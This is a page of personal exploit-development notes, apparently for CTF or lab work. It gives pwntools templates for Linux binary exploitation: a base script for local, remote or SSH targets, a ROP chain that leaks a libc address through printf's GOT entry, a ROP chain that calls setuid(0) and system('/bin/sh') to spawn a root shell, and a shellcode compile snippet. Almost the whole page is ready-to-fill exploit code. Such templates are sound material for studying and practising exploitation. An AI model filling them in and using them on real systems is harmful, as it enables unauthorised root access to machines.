xct's notes
Search…
Templates

Pwntools Linux Base

1
#!/usr/bin/env python3
2
from pwn import *
3
4
context.terminal = ['alacritty', '-e', 'zsh', '-c']
5
target = ''
6
7
context.binary = target
8
binary = ELF(target)
9
10
service_host = ""
11
service_port = 0
12
13
ssh_host = ''
14
ssh_user = ''
15
ssh_pass = ''
16
ssh_port = 22
17
18
if args['GDB']:
19
p = gdb.debug(target,
20
'''
21
source /home/xct/tools/pwndbg/gdbinit.py
22
continue
23
''')
24
else:
25
if args['SSH']:
26
sh = ssh(host=ssh_host, user=ssh_user, password=ssh_pass, port=ssh_port)
27
p = sh.run('/bin/bash')
28
junk = p.recv(4096,timeout=2)
29
p.sendline(target)
30
else:
31
if args['REMOTE']:
32
p = remote(service_host,service_port)
33
else:
34
p = process(target,setuid=True, level='DEBUG')
35
36
buf = b""
37
38
p.recvuntil("")
39
p.sendline(buf)
40
p.interactive()
Copied!

Leak and jump back

1
rop = ROP(binary)
2
rop.call(binary.plt["printf"], [binary.got["printf"],"%s"])
3
rop.call(binary.symbols['_start'])
4
log.info(rop.dump())
5
6
buf = b""
7
buf += b"A"*100+rop.chain()
8
p.sendline(buf)
9
10
out = p.recvline()
11
out = out.strip(b"\n")
12
out = u64(out.ljust(8,b"\x00"))
Copied!

Spawn Shell

1
rop = ROP(libc)
2
sh = next(libc.search(b"/bin/sh\x00"))
3
rop.call(libc.symbols['setuid'], [0x0])
4
rop.call(libc.symbols['system'], [sh])
5
log.info(rop.dump())
6
7
buf = b""
8
buf += b"A"*100+rop.chain()
9
p.sendline(buf)
10
p.interactive()
Copied!

Compile Shellcode with Pwntools

1
from pwn import *
2
3
context.arch = 'amd64'
4
5
code = """
6
// cpuid
7
mov rax, 0x00
8
cpuid
9
// exit
10
mov rdi, 0x00
11
mov rax, 60
12
syscall
13
"""
14
15
elf = make_elf_from_assembly(code,extract=True) #, shared=1)
16
17
with open('cpuid', 'wb') as f:
18
f.write(elf)
Copied!
Last modified 9mo ago